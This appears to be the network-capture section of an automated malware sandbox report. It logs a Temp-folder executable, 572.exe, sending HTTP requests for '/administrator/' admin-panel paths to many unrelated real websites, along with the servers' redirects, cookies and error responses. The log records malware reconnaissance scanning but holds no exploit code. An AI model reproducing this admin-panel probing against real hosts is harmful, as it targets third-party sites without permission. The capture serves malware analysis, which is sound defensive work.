163 | 192.168.2.6 | 54960 | 177.74.1.157 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.759857893 CET | 182 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sistemas.pa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.012419939 CET | 119 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://sistemas.pa.gov.br/administrator/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
164 | 192.168.2.6 | 55247 | 54.85.194.183 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.761626959 CET | 185 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.878971100 CET | 404 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/administrator/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>
Feb 5, 2024 12:14:53.574162006 CET | 249 | OUT | GET /administrator/index.php HTTP/1.1
Host: pxndx-mcr.boletia.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: https://pxndx-mcr.boletia.com/administrator/
Feb 5, 2024 12:14:53.690851927 CET | 413 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Server: nginx/1.12.2
Location: https://pxndx-mcr.boletia.com/administrator/index.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
165 | 192.168.2.6 | 55261 | 20.231.114.24 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.763947964 CET | 182 | OUT | GET /administrator/ HTTP/1.1
Host: account.mojang.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.882514000 CET | 351 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:14:50 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.minecraft.net/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
166 | 192.168.2.6 | 54758 | 13.248.169.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.770139933 CET | 182 | OUT | GET /administrator/ HTTP/1.1
Host: secure.vexcorp.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.096194029 CET | 1190 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Feb 2024 11:14:50 GMT
Content-Type: text/html
Content-Length: 315
Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
Connection: keep-alive
ETag: "65b834fa-13b"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_eomyKyGJY1bSwWR6/A5M0ypjsPkiPZZRAX/uCHH6syP1nAU9/MYAHRN/MHO3HGdgrrStP7wxVEPhIdPpRPiSug
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.133436918 CET398OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=81.181.57.74; _policy={"restricted_market":false,"tracking_market":"none"}; country=RO; city=""
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://secure.vexcorp.com/administrator/
Feb 5, 2024 12:14:51.300560951 CET    1190    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_eomyKyGJY1bSwWR6/A5M0ypjsPkiPZZRAX/uCHH6syP1nAU9/MYAHRN/MHO3HGdgrrStP7wxVEPhIdPpRPiSug
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
Feb 5, 2024 12:14:51.460931063 CET    1190    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IROBcQt3SQkxy9NX+3thtf90NpuuQl9buOIFD76u2q6O89LDKwEN4b71WTJ1ixhDtg2Xl6Grh7DzUq4GAcWWBA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
Feb 5, 2024 12:14:51.668589115 CET    1190    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IROBcQt3SQkxy9NX+3thtf90NpuuQl9buOIFD76u2q6O89LDKwEN4b71WTJ1ixhDtg2Xl6Grh7DzUq4GAcWWBA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
167    192.168.2.6    55277    170.114.52.2    80    524    C:\Users\user\AppData\Local\Temp\572.exe
Timestamp    Bytes transferred    Direction    Data
Feb 5, 2024 12:14:50.787453890 CET    177    OUT    GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.942384958 CET    1017    IN    HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://gitam.zoom.us/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=yiq1B8YEZVhYo.D8k_mwhbTalJ.JjtmRDL6E40Nidh4-1707131690-1-ATVYwLWBgjiKUCE4omuuds5N59R+DQZZVEpX+yPROipOuIZAap/jQ4iYwVOrnUjoW61qq/+ha5oVKmj94MXzb2w=; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ekG0kxxZNXtqOpt7JmtxZ7ikKIeyiE5Z%2F%2BTHSd3WWJV41RPpXfzuBvRmEbAE7kmfcF264fZv8kLLx%2Fg146rwHGN1hr%2FASFhVbS1s%2Bbpmd%2FrtOp2brTfBZX%2BBLK%2Ftses%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6bbff34527-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>
Feb 5, 2024 12:16:06.244151115 CET | 349 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=yiq1B8YEZVhYo.D8k_mwhbTalJ.JjtmRDL6E40Nidh4-1707131690-1-ATVYwLWBgjiKUCE4omuuds5N59R+DQZZVEpX+yPROipOuIZAap/jQ4iYwVOrnUjoW61qq/+ha5oVKmj94MXzb2w=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.367451906 CET | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qK9PNyzwXathFv3E3jUcK4mRbmY5M9WqFnyeUWG0aNUl9ki6VC%2BBp6ajRMQUMjslVYpXWxl%2BjxOE%2BM1sbJbsmOdiYF9Qwnq%2BlTV9ZqfNTzGVrCDKICObICLlzVJMXTQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd435c484527-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
168 | 192.168.2.6 | 55205 | 104.21.60.188 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.788306952 CET | 176 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: netizion.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.914009094 CET | 670 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://netizion.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6SAhXxKhQsOu2HJl21acZG4fVEFMs458vmHgA06q4jhBoVhwheMoZSWUwkL5Sdu5Pw7yvOdkxIM%2FZvlDq%2FLFq%2BmqHxj4eAndexmNx1iJ%2BYCHOqqB03uy8PJaPUbtvOg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6bcebe6773-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:06.185437918 CET | 185 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: netizion.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.310420036 CET | 677 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://netizion.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aqnnUUeF1bu%2BNTc%2FUVAOoI6nvT3IKmBmIEJ0y5VyuqR5QJkEvTb2pKOQYWsbX%2BdHOpmBtagSkvoMiEYdn8c5T7jxRWZUHeWDAhKR1QyA5bfWtZhzk2IDlUx5QAO0JXI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42f84e6773-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                169192.168.2.65520354.183.63.24180524C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:50.788619041 CET  182  OUT  GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.973685026 CET  1286  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=043e21066f59341f79d55d583419ce99; expires=Mon, 04 Mar 2024 11:14:50 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=043e21066f59341f79d55d583419ce99; expires=Mon, 04 Mar 2024 11:14:50 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: b3ImgELbU2l0Yu6aF3X
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
Feb 5, 2024 12:14:51.118958950 CET  291  OUT  GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: osCsid=043e21066f59341f79d55d583419ce99
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://pt.secure.imvu.com/administrator/
Feb 5, 2024 12:14:51.310655117 CET  1286  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: QVzQdd5i06Z7LhzB
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 8ttfPpc91V5!_uww0`6182%siKp:_(xQ8WYHcNen5"Bl,YUM(gq^__WJ6Du{VkZe@jl0 bQ%)$0btBs*
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.310775042 CET1270INData Raw: 58 3d 2f b3 f7 37 29 c2 82 d2 0c 7c 51 bf 72 23 72 03 2d a9 65 8a d1 06 66 f0 07 b2 04 8b e4 17 31 24 d2 05 0c 95 10 3e 57 e3 9d cf e2 c7 1e f3 9d 2f 62 c6 8b 02 c7 e0 52 4c bd 19 84 a9 18 43 ab b1 ac f5 7e 5e 89 54 8b 50 b4 09 d9 c1 ac 3d 3e a0
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: X=/7)|Qr#r-ef1$>W/bRLC~^TP=>FLZ""r"86HLMr*dcz`D+-F1j@:5mPn{s{f3) 6%`PzftF_bf=tfFlPCp
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.310789108 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
170  192.168.2.6  55012  124.237.208.37  80  524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:50.788835049 CET  177  OUT  GET /administrator/ HTTP/1.1
Host: pan.baidu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.164282084 CET  1280  IN  HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:14:50 GMT
Etag: W/"61128294-3feb"
Logid: 8900799505880304556
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Set-Cookie: BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1; expires=Tue, 04-Feb-25 11:14:50 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900799505880304556
Yme: ZIGW/y8rX0QMaTYYTmvhrm5XvfwASwfzoAJPwiY=
Transfer-Encoding: chunked
Feb 5, 2024 12:14:51.164911032 CET  296  OUT  GET /administrator/index.php HTTP/1.1
Host: pan.baidu.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: PANPSC=; BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1
